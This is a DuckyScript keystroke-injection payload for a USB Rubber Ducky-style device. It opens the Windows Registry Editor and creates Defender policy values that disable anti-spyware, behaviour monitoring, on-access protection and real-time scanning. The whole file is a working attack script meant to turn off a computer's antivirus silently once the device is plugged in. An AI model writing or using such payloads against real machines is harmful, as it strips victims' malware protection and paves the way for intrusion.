REM Title: Disable Windows Defender Permanently
REM Description: Disables windows defender permanently through Registry Editor, computer has to restart for changes to take effect
REM Author: https://github.com/HokkaidoInu
REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer
DELAY 500
GUI r
DELAY 500
STRING regedit
DELAY 500
ENTER
DELAY 500
LEFT
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
STRING HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING n
DELAY 500
STRING d
DELAY 500
STRING DisableAntiSpyware
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING m
DELAY 500
STRING 1
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
APP
DELAY 500
STRING n
DELAY 500
STRING k
DELAY 500
STRING Real-Time Protection
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING n
DELAY 500
STRING d
DELAY 500
STRING DisableBehaviorMonitoring
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING m
DELAY 500
STRING 1
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
APP
DELAY 500
STRING n
DELAY 500
STRING d
DELAY 500
STRING DisableOnAccessProtection
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING m
DELAY 500
STRING 1
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
APP
DELAY 500
STRING n
DELAY 500
STRING d
DELAY 500
STRING DisableScanOnRealtimeEnable
DELAY 500
ENTER
DELAY 500
APP
DELAY 500
STRING m
DELAY 500
STRING 1
DELAY 500
ENTER
DELAY 500
ALT F X